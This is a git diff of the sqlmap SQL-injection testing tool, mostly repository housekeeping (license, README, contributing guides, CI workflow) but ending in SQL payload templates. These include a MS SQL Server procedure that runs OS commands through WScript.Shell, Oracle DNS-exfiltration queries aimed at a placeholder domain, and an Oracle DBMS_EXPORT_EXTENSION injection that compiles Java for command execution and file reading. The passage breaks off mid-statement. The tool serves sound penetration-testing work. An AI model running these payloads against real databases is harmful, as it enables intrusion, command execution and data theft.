diff --git a/.gitattributes b/.gitattributes index 8b6e58fe06a..a99321d231b 100644 --- a/.gitattributes +++ b/.gitattributes @@ -1,4 +1,18 @@ +*.conf text eol=lf +*.json text eol=lf +*.html text eol=lf +*.md text eol=lf +*.md5 text eol=lf +*.pl text eol=lf *.py text eol=lf +*.sh text eol=lf +*.sql text eol=lf +*.txt text eol=lf +*.xml text eol=lf +*.yaml text eol=lf +*.yml text eol=lf +LICENSE text eol=lf +COMMITMENT text eol=lf *_ binary *.dll binary diff --git a/.github/CODE_OF_CONDUCT.md b/.github/CODE_OF_CONDUCT.md new file mode 100644 index 00000000000..2a36badf3f6 --- /dev/null +++ b/.github/CODE_OF_CONDUCT.md @@ -0,0 +1,46 @@ +# Contributor Covenant Code of Conduct + +## Our Pledge + +In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. + +## Our Standards + +Examples of behavior that contributes to creating a positive environment include: + +* Using welcoming and inclusive language +* Being respectful of differing viewpoints and experiences +* Gracefully accepting constructive criticism +* Focusing on what is best for the community +* Showing empathy towards other community members + +Examples of unacceptable behavior by participants include: + +* The use of sexualized language or imagery and unwelcome sexual attention or advances +* Trolling, insulting/derogatory comments, and personal or political attacks +* Public or private harassment +* Publishing others' private information, such as a physical or electronic address, without explicit permission +* Other conduct which could reasonably be considered inappropriate in a professional setting + +## Our Responsibilities + +Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. + +Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. + +## Scope + +This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. + +## Enforcement + +Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. + +Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. + +## Attribution + +This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] + +[homepage]: http://contributor-covenant.org +[version]: http://contributor-covenant.org/version/1/4/ diff --git a/CONTRIBUTING.md b/.github/CONTRIBUTING.md similarity index 57% rename from CONTRIBUTING.md rename to .github/CONTRIBUTING.md index 19f3582fd5b..2ae80685613 100644 --- a/CONTRIBUTING.md +++ b/.github/CONTRIBUTING.md @@ -1,38 +1,36 @@ -# Contributing to sqlmap - -## Reporting bugs - -**Bug reports are welcome**! -Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues) or, alternatively, to the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users). - -### Guidelines - -* Before you submit a bug report, search both open and closed issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. -* Make sure you can reproduce the bug with the latest development version of sqlmap. -* Your report should give detailed instructions for how to reproduce the problem. If sqlmap raises an unhandled exception, the traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. -* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* -* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up. - -## Submitting code changes - -All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). - -Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). -Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! - -### Guidelines - -In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: - -* Each patch should make one logical change. -* Wrap code to 76 columns when possible. -* Avoid tabbing, use four blank spaces instead. -* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org). -* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. -* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. -* Style that is too different from main branch will be ''adapted'' by the developers side. -* Do not touch anything inside `thirdparty/` and `extra/` folders. - -### Licensing - -By submitting code contributions to the sqlmap developers, to the mailing lists, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap project the unlimited, non-exclusive right to reuse, modify, and relicense the code. sqlmap will always be available Open Source, but this is important because the inability to relicense code has caused devastating problems for other Free Software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. +# Contributing to sqlmap + +## Reporting bugs + +**Bug reports are welcome**! +Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues). + +### Guidelines + +* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. +* Make sure you can reproduce the bug with the latest development version of sqlmap. +* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. +* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* + +## Submitting code changes + +All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). + +Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). +Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! + +### Guidelines + +In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: + +* Each patch should make one logical change. +* Avoid tabbing, use four blank spaces instead. +* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org). +* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. +* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. +* Style that is too different from main branch will be ''adapted'' by the developers side. +* Do not touch anything inside `thirdparty/` and `extra/` folders. + +### Licensing + +By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml new file mode 100644 index 00000000000..e6b299956eb --- /dev/null +++ b/.github/FUNDING.yml @@ -0,0 +1 @@ +github: sqlmapproject diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md new file mode 100644 index 00000000000..0a2d0fe4aea --- /dev/null +++ b/.github/ISSUE_TEMPLATE/bug_report.md @@ -0,0 +1,37 @@ +--- +name: Bug report +about: Create a report to help us improve +title: '' +labels: bug report +assignees: '' + +--- + +**Describe the bug** +A clear and concise description of what the bug is. + +**To Reproduce** +1. Run '...' +2. See error + +**Expected behavior** +A clear and concise description of what you expected to happen. + +**Screenshots** +If applicable, add screenshots to help explain your problem. + +**Running environment:** + - sqlmap version [e.g. 1.7.2.12#dev] + - Installation method [e.g. pip] + - Operating system: [e.g. Microsoft Windows 11] + - Python version [e.g. 3.11.2] + +**Target details:** + - DBMS [e.g. Microsoft SQL Server] + - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind] + - WAF/IPS [if any] + - Relevant console output [if any] + - Exception traceback [if any] + +**Additional context** +Add any other context about the problem here. diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md new file mode 100644 index 00000000000..e301d68ce74 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/feature_request.md @@ -0,0 +1,20 @@ +--- +name: Feature request +about: Suggest an idea for this project +title: '' +labels: feature request +assignees: '' + +--- + +**Is your feature request related to a problem? Please describe.** +A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] + +**Describe the solution you'd like** +A clear and concise description of what you want to happen. + +**Describe alternatives you've considered** +A clear and concise description of any alternative solutions or features you've considered. + +**Additional context** +Add any other context or screenshots about the feature request here. diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml new file mode 100644 index 00000000000..25100961dcd --- /dev/null +++ b/.github/workflows/tests.yml @@ -0,0 +1,31 @@ +on: + push: + branches: [ master ] + pull_request: + branches: [ master ] + +jobs: + build: + runs-on: ${{ matrix.os }} + strategy: + matrix: + os: [ubuntu-latest, macos-latest, windows-latest] + python-version: [ 'pypy-2.7', '3.8', '3.14' ] + exclude: + - os: macos-latest + python-version: 'pypy-2.7' + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + fetch-depth: 1 + - name: Set up Python ${{ matrix.python-version }} + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python-version }} + - name: Basic import test + run: python -c "import sqlmap; import sqlmapapi" + - name: Smoke test + run: python sqlmap.py --smoke + - name: Vuln test + run: python sqlmap.py --vuln diff --git a/.gitignore b/.gitignore index ff18ea7962e..1f7f94a3b1e 100644 --- a/.gitignore +++ b/.gitignore @@ -1,5 +1,8 @@ -*.py[cod] output/ +__pycache__/ +*.py[cod] .sqlmap_history traffic.txt -*~ \ No newline at end of file +*~ +req*.txt +.idea/ \ No newline at end of file diff --git a/doc/COPYING b/LICENSE similarity index 89% rename from doc/COPYING rename to LICENSE index 52f2214913f..cc0480cafb4 100644 --- a/doc/COPYING +++ b/LICENSE @@ -1,12 +1,12 @@ COPYING -- Describes the terms under which sqlmap is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -sqlmap is (C) 2006-2012 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. +sqlmap is (C) 2006-2026 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free -Software Foundation; Version 2 with the clarifications and exceptions -described below. This guarantees your right to use, modify, and +Software Foundation; Version 2 (or later) with the clarifications and +exceptions described below. This guarantees your right to use, modify, and redistribute this software under certain conditions. If you wish to embed sqlmap technology into proprietary software, we sell alternative licenses (contact sales@sqlmap.org). @@ -31,6 +31,9 @@ interpretation of derived works with some common examples. Our interpretation applies only to sqlmap - we do not speak for other people's GPL works. +This license does not apply to the third-party components. More details can +be found inside the file 'doc/THIRD-PARTY.md'. + If you have any questions about the GPL licensing restrictions on using sqlmap in non-GPL works, we would be happy to help. As mentioned above, we also offer alternative license to integrate sqlmap into proprietary @@ -46,14 +49,14 @@ to know exactly what a program is going to do before they run it. Source code also allows you to fix bugs and add new features. You are highly encouraged to send your changes to dev@sqlmap.org for possible incorporation into the main distribution. By sending these changes to the -sqlmap developers, to the mailing lists, or via Git pull request, checking -them into the sqlmap source code repository, it is understood (unless you -specify otherwise) that you are offering the sqlmap project the unlimited, -non-exclusive right to reuse, modify, and relicense the code. sqlmap will -always be available Open Source, but this is important because the -inability to relicense code has caused devastating problems for other Free -Software projects (such as KDE and NASM). If you wish to specify special -license conditions of your contributions, just say so when you send them. +sqlmap developers or via Git pull request, checking them into the sqlmap +source code repository, it is understood (unless you specify otherwise) +that you are offering the sqlmap project the unlimited, non-exclusive +right to reuse, modify, and relicense the code. sqlmap will always be +available Open Source, but this is important because the inability to +relicense code has caused devastating problems for other Free Software +projects (such as KDE and NASM). If you wish to specify special license +conditions of your contributions, just say so when you send them. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of @@ -343,29 +346,3 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS - -**************************************************************************** - -This license does not apply to the following components: - -* The Ansistrm library located under thirdparty/ansistrm/. -* The Beautiful Soup library located under thirdparty/beautifulsoup/. -* The Chardet library located under thirdparty/chardet/. -* The ClientForm library located under thirdparty/clientform/. -* The Colorama library located under thirdparty/colorama/. -* The Fcrypt library located under thirdparty/fcrypt/. -* The Gprof2dot library located under thirdparty/gprof2dot/. -* The KeepAlive library located under thirdparty/keepalive/. -* The Magic library located under thirdparty/magic/. -* The MultipartPost library located under thirdparty/multipartpost/. -* The Odict library located under thirdparty/odict/. -* The Oset library located under thirdparty/oset/. -* The PageRank library located under thirdparty/pagerank/. -* The PrettyPrint library located under thirdparty/prettyprint/. -* The PyDes library located under thirdparty/pydes/. -* The SocksiPy library located under thirdparty/socks/. -* The Termcolor library located under thirdparty/termcolor/. -* The XDot library located under thirdparty/xdot/. -* The icmpsh tool located under extra/icmpsh/. - -Details for the above packages can be found in the THIRD-PARTY.md file. diff --git a/README.md b/README.md index aea30605a5a..e85b3a04359 100644 --- a/README.md +++ b/README.md @@ -1,15 +1,80 @@ -sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -**Links** +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -* Homepage: http://sqlmap.org +sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections. + +Screenshots +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki. + +Installation +---- + +You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.7** and **3.x** on any platform. + +Usage +---- + +To get a list of basic options and switches use: + + python sqlmap.py -h + +To get a list of all options and switches use: + + python sqlmap.py -hh + +You can find a sample run [here](https://asciinema.org/a/46601). +To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Links +---- + +* Homepage: https://sqlmap.org * Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * User's manual: https://github.com/sqlmapproject/sqlmap/wiki -* Frequently Asked Questions: https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [#1](http://www.youtube.com/user/inquisb/videos) and [#2](http://www.youtube.com/user/stamparm/videos) +* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +Translations +---- + +* [Arabic](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ar-AR.md) +* [Bengali](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bn-BD.md) +* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) +* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) +* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) +* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md) +* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) +* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md) +* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md) +* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) +* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md) +* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) +* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) +* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) +* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md) +* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md) +* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md) +* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) +* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md) +* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md) +* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md) +* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) +* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) +* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md) +* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md) diff --git a/_sqlmap.py b/_sqlmap.py deleted file mode 100644 index 9de694a2bb4..00000000000 --- a/_sqlmap.py +++ /dev/null @@ -1,134 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import bdb -import os -import sys -import time -import traceback -import warnings - -warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) -warnings.filterwarnings(action="ignore", category=DeprecationWarning) - -from lib.controller.controller import start -from lib.core.common import banner -from lib.core.common import dataToStdout -from lib.core.common import getUnicode -from lib.core.common import setPaths -from lib.core.common import weAreFrozen -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.common import unhandledExceptionMessage -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapSilentQuitException -from lib.core.exception import SqlmapUserQuitException -from lib.core.option import init -from lib.core.profiling import profile -from lib.core.settings import LEGAL_DISCLAIMER -from lib.core.testing import smokeTest -from lib.core.testing import liveTest -from lib.parse.cmdline import cmdLineParser -from lib.utils.api import StdDbOut - -def modulePath(): - """ - This will get us the program's directory, even if we are frozen - using py2exe - """ - - return os.path.dirname(getUnicode(sys.executable if weAreFrozen() else __file__, sys.getfilesystemencoding())) - -def main(): - """ - Main function of sqlmap when running from command line. - """ - - try: - paths.SQLMAP_ROOT_PATH = modulePath() - setPaths() - - # Store original command line options for possible later restoration - cmdLineOptions.update(cmdLineParser().__dict__) - init(cmdLineOptions) - - if hasattr(conf, "api"): - # Overwrite system standard output and standard error to write - # to an IPC database - sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") - sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") - - banner() - - dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) - dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) - - if conf.profile: - profile() - elif conf.smokeTest: - smokeTest() - elif conf.liveTest: - liveTest() - else: - start() - - except SqlmapUserQuitException: - errMsg = "user quit" - logger.error(errMsg) - - except (SqlmapSilentQuitException, bdb.BdbQuit): - pass - - except SqlmapBaseException, e: - e = getUnicode(e) - logger.critical(e) - sys.exit(1) - - except KeyboardInterrupt: - print - errMsg = "user aborted" - logger.error(errMsg) - - except EOFError: - print - errMsg = "exit" - logger.error(errMsg) - - except SystemExit: - pass - - except: - print - errMsg = unhandledExceptionMessage() - logger.critical(errMsg) - traceback.print_exc() - - finally: - dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) - - kb.threadContinue = False - kb.threadException = True - - if conf.get("hashDB"): - try: - conf.hashDB.flush(True) - except KeyboardInterrupt: - pass - - if hasattr(conf, "api"): - try: - conf.database_cursor.close() - conf.database_connection.close() - except KeyboardInterrupt: - pass - - # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program - if conf.get("threads", 0) > 1 or conf.get("dnsServer"): - os._exit(0) diff --git a/procs/README.txt b/data/procs/README.txt similarity index 100% rename from procs/README.txt rename to data/procs/README.txt diff --git a/procs/mssqlserver/activate_sp_oacreate.sql b/data/procs/mssqlserver/activate_sp_oacreate.sql similarity index 100% rename from procs/mssqlserver/activate_sp_oacreate.sql rename to data/procs/mssqlserver/activate_sp_oacreate.sql diff --git a/procs/mssqlserver/configure_openrowset.sql b/data/procs/mssqlserver/configure_openrowset.sql similarity index 100% rename from procs/mssqlserver/configure_openrowset.sql rename to data/procs/mssqlserver/configure_openrowset.sql diff --git a/procs/mssqlserver/configure_xp_cmdshell.sql b/data/procs/mssqlserver/configure_xp_cmdshell.sql similarity index 77% rename from procs/mssqlserver/configure_xp_cmdshell.sql rename to data/procs/mssqlserver/configure_xp_cmdshell.sql index 349c8cf8c37..e23e4b06a48 100644 --- a/procs/mssqlserver/configure_xp_cmdshell.sql +++ b/data/procs/mssqlserver/configure_xp_cmdshell.sql @@ -2,5 +2,5 @@ EXEC master..sp_configure 'show advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; RECONFIGURE WITH OVERRIDE; -EXEC sp_configure 'show advanced options',0; +EXEC master..sp_configure 'show advanced options',0; RECONFIGURE WITH OVERRIDE diff --git a/data/procs/mssqlserver/create_new_xp_cmdshell.sql b/data/procs/mssqlserver/create_new_xp_cmdshell.sql new file mode 100644 index 00000000000..005730860fa --- /dev/null +++ b/data/procs/mssqlserver/create_new_xp_cmdshell.sql @@ -0,0 +1,3 @@ +DECLARE @%RANDSTR% nvarchar(999); +set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; +EXEC master..sp_executesql @%RANDSTR% diff --git a/procs/mssqlserver/disable_xp_cmdshell_2000.sql b/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql similarity index 100% rename from procs/mssqlserver/disable_xp_cmdshell_2000.sql rename to data/procs/mssqlserver/disable_xp_cmdshell_2000.sql diff --git a/procs/mssqlserver/dns_request.sql b/data/procs/mssqlserver/dns_request.sql similarity index 100% rename from procs/mssqlserver/dns_request.sql rename to data/procs/mssqlserver/dns_request.sql diff --git a/procs/mssqlserver/enable_xp_cmdshell_2000.sql b/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql similarity index 100% rename from procs/mssqlserver/enable_xp_cmdshell_2000.sql rename to data/procs/mssqlserver/enable_xp_cmdshell_2000.sql diff --git a/procs/mssqlserver/run_statement_as_user.sql b/data/procs/mssqlserver/run_statement_as_user.sql similarity index 100% rename from procs/mssqlserver/run_statement_as_user.sql rename to data/procs/mssqlserver/run_statement_as_user.sql diff --git a/procs/mysql/dns_request.sql b/data/procs/mysql/dns_request.sql similarity index 100% rename from procs/mysql/dns_request.sql rename to data/procs/mysql/dns_request.sql diff --git a/procs/mysql/write_file_limit.sql b/data/procs/mysql/write_file_limit.sql similarity index 87% rename from procs/mysql/write_file_limit.sql rename to data/procs/mysql/write_file_limit.sql index 58fccab0a19..e879fbe4030 100644 --- a/procs/mysql/write_file_limit.sql +++ b/data/procs/mysql/write_file_limit.sql @@ -1 +1 @@ -LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- +LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- - diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql new file mode 100644 index 00000000000..5dda762c08d --- /dev/null +++ b/data/procs/oracle/dns_request.sql @@ -0,0 +1,3 @@ +SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL +# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL +# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual diff --git a/data/procs/oracle/read_file_export_extension.sql b/data/procs/oracle/read_file_export_extension.sql new file mode 100644 index 00000000000..3d66bbaf53d --- /dev/null +++ b/data/procs/oracle/read_file_export_extension.sql @@ -0,0 +1,4 @@ +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL +SELECT 